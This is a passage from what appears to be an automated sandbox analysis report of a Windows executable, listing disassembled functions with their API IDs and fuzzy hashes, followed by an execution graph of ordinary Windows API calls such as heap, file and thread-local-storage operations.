                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID: $ $invalid stored block lengths
                                                              • API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              Function 00000001400171F0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              Function 0000000140017120 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                              Execution Graph

                                                              Execution Coverage:14.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
                                                              execution_graph 7543 140001dea 7544 140001ded 7543->7544 7555 140012360 7544->7555 7547 140012360 HeapFree 7548 140001e11 7547->7548 7549 140012360 HeapFree 7548->7549 7550 140001e23 7549->7550 7551 140012360 HeapFree 7550->7551 7552 140001e35 7551->7552 7553 140012360 HeapFree 7552->7553 7554 140001e47 7553->7554 7556 140012371 HeapFree 7555->7556 7557 140001dfc 7555->7557 7556->7557 7557->7547 8328 140011f69 8329 14001202d 8328->8329 8330 140011f89 8328->8330 8330->8329 8331 140011fc4 8330->8331 8334 140011d30 4 API calls 8330->8334 8332 140011feb 8331->8332 8333 140011fcf memmove 8331->8333 8332->8329 8335 140011ffb 8332->8335 8336 14001202f memmove 8332->8336 8333->8332 8334->8331 8335->8329 8337 140016538 5 API calls 8335->8337 8336->8329 8337->8335 7558 1400141eb 7559 1400141f6 7558->7559 7561 14001430c 7559->7561 7562 140014d80 7559->7562 7563 140014dad 7562->7563 7564 140014e0a memmove 7563->7564 7565 140014def memmove 7563->7565 7566 140014dc7 7563->7566 7564->7566 7567 140014e2b memmove 7564->7567 7565->7566 7566->7561 7567->7566 8189 1400016ed 8190 1400016f0 8189->8190 8191 140012360 HeapFree 8190->8191 8192 1400016ff 8191->8192 8193 140011ef4 2 API calls 8192->8193 8194 140001711 8193->8194 8195 140011ef4 2 API calls 8194->8195 8196 140001723 8195->8196 7889 140003c6e 7890 140003c71 7889->7890 7891 140012360 HeapFree 7890->7891 7892 140003c80 7891->7892 7893 140012360 HeapFree 7892->7893 7894 140003c92 7893->7894 7895 140012360 HeapFree 7894->7895 7896 140003ca7 7895->7896 7897 140012360 HeapFree 7896->7897 7898 140003cb9 7897->7898 7899 140017070 7900 1400170f8 7899->7900 7901 140017097 MultiByteToWideChar 7899->7901 7902 1400126d0 2 API calls 7900->7902 7901->7900 7904 1400170c9 7901->7904 7905 140017101 7902->7905 7906 1400126d0 2 API calls 7904->7906 7907 1400170d2 MultiByteToWideChar 7906->7907 7907->7905 7908 140012c70 TlsGetValue HeapFree HeapFree 7909 140010c70 7912 140010c98 7909->7912 7913 140010cd1 7912->7913 7914 140010ceb 7912->7914 7917 140010cd9 7912->7917 7918 1400171f0 7913->7918 7914->7917 7925 140016e50 7914->7925 7931 140010f00 7917->7931 7919 140017216 WideCharToMultiByte 7918->7919 7920 14001729d malloc 7918->7920 7919->7920 7923 14001725a malloc 7919->7923 7921 1400172aa 7920->7921 7921->7917 7923->7920 7924 14001726d WideCharToMultiByte 7923->7924 7924->7921 7926 140016e76 WideCharToMultiByte 7925->7926 7929 140016f02 7925->7929 7928 140016ebe malloc 7926->7928 7926->7929 7928->7929 7930 140016ecf WideCharToMultiByte 7928->7930 7929->7917 7930->7929 7932 140010f1e 7931->7932 7933 1400126d0 2 API calls 7932->7933 7934 140010d5b 7933->7934 8197 140014af0 8199 140014b26 8197->8199 8200 140014b12 8197->8200 8198 140014d80 3 API calls 8198->8199 8200->8198 8200->8199 7397 14000e3f0 7398 14000e4ee 7397->7398 7399 14000e40a 7397->7399 7399->7398 7400 14000e483 7399->7400 7401 14000e41a 7399->7401 7414 14000e770 WideCharToMultiByte 7400->7414 7403 14000e451 7401->7403 7404 14000e425 7401->7404 7403->7403 7405 14000e45d WriteFile 7403->7405 7409 14000e620 5 API calls 7404->7409 7407 14000e4c5 WriteFile 7411 14000e4dc HeapFree 7407->7411 7408 14000e4b7 7418 14000e620 7408->7418 7412 14000e445 7409->7412 7411->7398 7413 14000e4bf 7413->7411 7415 14000e7b9 HeapAlloc 7414->7415 7416 14000e4a0 7414->7416 7415->7416 7417 14000e7d8 WideCharToMultiByte 7415->7417 7416->7398 7416->7407 7416->7408 7417->7416 7419 14000e644 7418->7419 7420 14000e75e 7418->7420 7421 14000e673 7419->7421 7422 14000e64a SetFilePointer 7419->7422 7420->7413 7423 14000e67e 7421->7423 7424 14000e6ff 7421->7424 7422->7421 7425 14000e6b7 7423->7425 7428 14000e699 memmove 7423->7428 7431 14000ddc0 7424->7431 7425->7413 7427 14000e707 7429 14000e711 WriteFile 7427->7429 7430 14000e739 memmove 7427->7430 7428->7413 7429->7413 7430->7413 7432 14000de04 7431->7432 7433 14000ddd4 WriteFile 7431->7433 7432->7427 7433->7427 7568 14000e1f0 7569 1400112a8 5 API calls 7568->7569 7570 14000e21b 7569->7570 7571 14000e227 CreateFileW 7570->7571 7572 14000e27f 7570->7572 7571->7572 7573 14000e25c 7571->7573 7573->7572 7574 14000e267 HeapAlloc 7573->7574 7574->7572 7579 1400113f8 EnterCriticalSection 7580 140011423 LeaveCriticalSection 7579->7580 7935 140016c77 7936 140016c89 TlsFree 7935->7936 7937 140016cbf 7935->7937 7939 140016c97 7936->7939 7938 140016cab DeleteCriticalSection 7938->7937 7939->7938 8201 14000d8f8 8202 14000d908 8201->8202 8203 14000d90d 8201->8203 8205 140011a50 8202->8205 8206 140011a81 8205->8206 8207 140011a60 8205->8207 8206->8203 8211 140011c48 EnterCriticalSection 8207->8211 8209 140011a65 8209->8206 8212 140011bdc 8209->8212 8211->8209 8213 140011be7 8212->8213 8214 140011c3c 8213->8214 8215 140011c32 LeaveCriticalSection 8213->8215 8214->8209 8215->8214 7393 140010ffc 7394 140011009 7393->7394 7395 14001101f 7393->7395 7394->7395 7396 140011013 TlsFree 7394->7396 7396->7395 8338 140010b7c 8339 140010b85 memset 8338->8339 8340 140010b8d 8338->8340 8339->8340 8341 14000477e 8342 140012360 HeapFree 8341->8342 8343 140004790 8342->8343 8344 140012360 HeapFree 8343->8344 8345 1400047a2 8344->8345 8346 140012360 HeapFree 8345->8346 8347 1400047b4 8346->8347 8348 140012360 HeapFree 8347->8348 8349 1400047c6 8348->8349 8350 140012360 HeapFree 8349->8350 8351 1400047d8 8350->8351 7434 140001000 7435 14000101d 7434->7435 7486 140012060 HeapCreate TlsAlloc 7435->7486 7437 14000105b 7489 14000de20 7437->7489 7439 140001065 7492 14000c980 HeapCreate 7439->7492 7441 140001074 7493 14000c07c 7441->7493 7443 140001079 7444 14000b538 memset InitCommonControlsEx CoInitialize 7443->7444 7445 14000107e 7444->7445 7446 140007160 InitializeCriticalSection 7445->7446 7447 140001083 7446->7447 7448 1400120d0 HeapAlloc HeapReAlloc HeapFree 7447->7448 7449 1400010a3 7448->7449 7450 14000ccd8 32 API calls 7449->7450 7451 1400010e6 7450->7451 7452 14000d524 16 API calls 7451->7452 7453 1400010fa 7452->7453 7454 14000d444 11 API calls 7453->7454 7455 14000111e 7454->7455 7456 14000d524 16 API calls 7455->7456 7457 14000112a 7456->7457 7458 14000d444 11 API calls 7457->7458 7459 14000114e 7458->7459 7460 140011d30 HeapAlloc memset HeapFree HeapFree 7459->7460 7461 140001185 7460->7461 7462 1400120d0 HeapAlloc HeapReAlloc HeapFree 7461->7462 7463 1400011a6 7462->7463 7464 14000d524 16 API calls 7463->7464 7465 1400011b2 7464->7465 7466 14000d444 11 API calls 7465->7466 7467 1400011d6 7466->7467 7468 14000c4d0 RemoveVectoredExceptionHandler AddVectoredExceptionHandler 7467->7468 7469 1400011e5 7468->7469 7470 1400121c0 GetLastError TlsGetValue SetLastError 7469->7470 7471 1400011ef 7470->7471 7472 1400121c0 GetLastError TlsGetValue SetLastError 7471->7472 7473 1400011ff 7472->7473 7474 140004211 31 API calls 7473->7474 7475 14000120e 7474->7475 7476 140012210 TlsGetValue HeapAlloc HeapReAlloc 7475->7476 7477 14000121f 7476->7477 7478 1400021ea 50 API calls 7477->7478 7479 140001224 7478->7479 7480 140001236 7479->7480 7481 14000433f 188 API calls 7479->7481 7482 14000593c 232 API calls 7480->7482 7481->7480 7483 14000123b 7482->7483 7484 1400120a0 HeapDestroy TlsFree 7483->7484 7485 140001245 HeapDestroy ExitProcess 7484->7485 7498 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7486->7498 7488 14001208c 7488->7437 7499 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7489->7499 7491 14000de38 7491->7439 7492->7441 7500 1400110dc 7493->7500 7497 14000c0a8 InitializeCriticalSection 7498->7488 7499->7491 7501 1400110fd 7500->7501 7502 140011112 TlsAlloc HeapAlloc TlsSetValue 7501->7502 7503 140011149 TlsGetValue HeapReAlloc TlsSetValue 7501->7503 7502->7503 7504 140011198 7503->7504 7505 14000c08d 7504->7505 7508 140011cb0 HeapAlloc 7504->7508 7507 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7505->7507 7507->7497 7509 140011cd3 7508->7509 7509->7505 7582 140007a00 7585 140007a50 7582->7585 7586 140007a79 7585->7586 7607 140012630 TlsGetValue 7586->7607 7589 140012630 TlsGetValue 7590 140007a9c 7589->7590 7609 1400126d0 TlsGetValue 7590->7609 7593 140007abf 7599 140007acf 7593->7599 7614 1400127f0 TlsGetValue 7593->7614 7596 140007c35 7615 1400128a0 TlsGetValue 7596->7615 7598 140007a1c 7599->7596 7599->7599 7600 140007b20 HeapAlloc 7599->7600 7601 140007b50 7599->7601 7600->7601 7601->7601 7602 140007b91 wcsncpy 7601->7602 7605 140007bac 7601->7605 7602->7605 7603 140007c02 7603->7596 7604 140007c09 HeapFree 7603->7604 7604->7596 7605->7603 7606 140007bdf wcsncpy 7605->7606 7606->7603 7608 140007a92 7607->7608 7608->7589 7610 1400126f4 7609->7610 7611 14001272d HeapReAlloc 7610->7611 7612 140007ab1 7610->7612 7611->7612 7612->7593 7613 1400127f0 TlsGetValue 7612->7613 7613->7593 7614->7599 7615->7598 7616 140008200 7619 140008260 7616->7619 7620 1400082e4 7619->7620 7621 140008397 7620->7621 7632 14000830a 7620->7632 7623 140012630 TlsGetValue 7621->7623 7622 140008221 7624 14000839f 7623->7624 7625 1400083ba 7624->7625 7626 1400083aa _wcsdup 7624->7626 7627 140012630 TlsGetValue 7625->7627 7626->7625 7628 1400083c2 7627->7628 7629 1400083d8 7628->7629 7630 1400083cd _wcsdup 7628->7630 7631 140012630 TlsGetValue 7629->7631 7630->7629 7633 1400083e0 7631->7633 7632->7622 7634 140008363 wcsncpy 7632->7634 7635 1400083eb _wcsdup 7633->7635 7636 1400083f8 7633->7636 7634->7632 7635->7636 7636->7636 7637 1400126d0 2 API calls 7636->7637 7638 140008481 7637->7638 7639 1400084ed wcsncpy 7638->7639 7640 140008488 7638->7640 7641 14000850e 7638->7641 7639->7641 7642 140008575 7640->7642 7643 14000856d free 7640->7643 7641->7640 7647 1400085c0 wcsncpy 7641->7647 7644 140008587 7642->7644 7645 14000857f free 7642->7645 7643->7642 7644->7622 7646 140008591 free 7644->7646 7645->7644 7646->7622 7647->7641 7946 14000d881 7947 14000d89d 7946->7947 7948 14000d8dc 7946->7948 7947->7948 7951 14000d8af 7947->7951 7953 14000d60c 7947->7953 7951->7948 7960 14000d6a0 7951->7960 7965 140016538 7951->7965 7954 14000d656 7953->7954 7955 14000d62f 7953->7955 7956 14000d654 7954->7956 7957 1400116f4 3 API calls 7954->7957 7955->7956 7958 1400168c0 HeapFree 7955->7958 7974 1400116f4 7955->7974 7956->7951 7957->7954 7958->7955 7961 14001147c 4 API calls 7960->7961 7962 14000d6b6 7961->7962 7963 14000d6c2 memset 7962->7963 7964 14000d6d6 7962->7964 7963->7964 7964->7951 7966 1400168b7 7965->7966 7971 140016541 7965->7971 7966->7951 7967 1400168b2 memmove 7967->7966 7968 140016860 memmove 7968->7971 7969 140016895 7969->7966 7969->7967 7970 140016538 wcslen HeapAlloc HeapFree 7970->7971 7971->7968 7971->7969 7971->7970 7972 140012360 HeapFree 7971->7972 7981 1400122f0 7971->7981 7972->7971 7975 14001170a EnterCriticalSection 7974->7975 7976 140011714 7974->7976 7975->7976 7979 14001177b HeapFree 7976->7979 7980 140011794 7976->7980 7977 1400117f1 7977->7955 7978 1400117e7 LeaveCriticalSection 7978->7977 7979->7980 7980->7977 7980->7978 7982 140012351 7981->7982 7983 140012306 wcslen HeapAlloc 7981->7983 7982->7971 7985 140012820 7983->7985 7986 140012845 7985->7986 7986->7982 8224 140013507 8225 14001350c 8224->8225 8226 140014d80 3 API calls 8225->8226 8227 1400134ee 8225->8227 8226->8227 7648 140011e0c 7650 140011e56 7648->7650 7651 140011ec4 7650->7651 7652 140011d30 7650->7652 7658 140011ef4 7652->7658 7655 140011d6e HeapAlloc 7656 140011d90 memset 7655->7656 7657 140011dc6 7655->7657 7656->7657 7657->7651 7659 140011d69 7658->7659 7662 140011ef9 7658->7662 7659->7655 7659->7657 7660 140011f38 HeapFree 7660->7659 7662->7660 7663 1400168c0 7662->7663 7665 1400168da 7663->7665 7664 1400169fd 7664->7662 7665->7664 7666 1400168c0 